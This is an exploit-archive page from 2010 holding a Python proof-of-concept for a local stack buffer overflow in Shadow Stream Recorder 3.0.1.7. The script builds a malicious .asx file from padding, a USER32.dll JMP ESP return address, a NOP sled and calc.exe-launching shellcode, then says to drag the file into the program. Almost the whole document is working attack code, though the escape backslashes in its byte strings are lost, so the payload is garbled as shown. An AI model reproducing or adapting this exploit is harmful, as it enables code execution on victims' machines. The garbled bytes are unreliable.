Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow
# Published : 2010-03-30
# Author : b0telh0
# Previous Title : RM Downloader 3.0.2.1 (.asx) Local Buffer Overflow (SEH)
# Next Title : ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit

#!/usr/bin/python
#
# Title: Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow
# Date: 03-29-2010
# Author: b0telh0
# Link: http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe
# Tested on: Windows XP SP3


#
# windows/exec - 228 bytes
# EXITFUNC=seh, CMD=calc.exe
#

shellcode = ("xdaxd6xbexc4x14x6bx17x31xc9xd9x74x24xf4x58xb1"
	"x33x83xe8xfcx31x70x14x03x70xd0xf6x9exebx30x7f"
	"x60x14xc0xe0xe8xf1xf1x32x8ex72xa3x82xc4xd7x4f"
	"x68x88xc3xc4x1cx05xe3x6dxaax73xcax6ex1axbcx80"
	"xacx3cx40xdbxe0x9ex79x14xf5xdfxbex49xf5xb2x17"
	"x05xa7x22x13x5bx7bx42xf3xd7xc3x3cx76x27xb7xf6"
	"x79x78x67x8cx32x60x0cxcaxe2x91xc1x08xdexd8x6e"
	"xfax94xdaxa6x32x54xedx86x99x6bxc1x0bxe3xacxe6"
	"xf3x96xc6x14x8exa0x1cx66x54x24x81xc0x1fx9ex61"
	"xf0xccx79xe1xfexb9x0exadxe2x3cxc2xc5x1fxb5xe5"
	"x09x96x8dxc1x8dxf2x56x6bx97x5ex39x94xc7x07xe6"
	"x30x83xaaxf3x43xcexa0x02xc1x74x8dx04xd9x76xbe"
	"x6cxe8xfdx51xebxf5xd7x15x0dx07xeax83x99xbex9f"
	"xe9xc4x40x4ax2dxf0xc2x7fxcex07xdaxf5xcbx4cx5c"
	"xe5xa1xddx09x09x15xdex1bx6axf8x4cxc7x43x9fxf4"
	"x62x9cx55");

junk = "x41" * 26112
eip = "x53x93x37x7E"        # 7E379353  USER32.dll  (JMP ESP)
nops = "x90" * 20
junk2 = "x41" * 3636

try:
    file = open('b0t.asx','w');
    file.write(junk+eip+nops+shellcode+junk2);
    file.close();
    print "n[+] b0t.asx created."
    print "[+] Open ssrecorder.exe..."
    print "[+] and drag and drop b0t.asx.n"
except:
    print "n[-] Error.. Can't write file to system.n"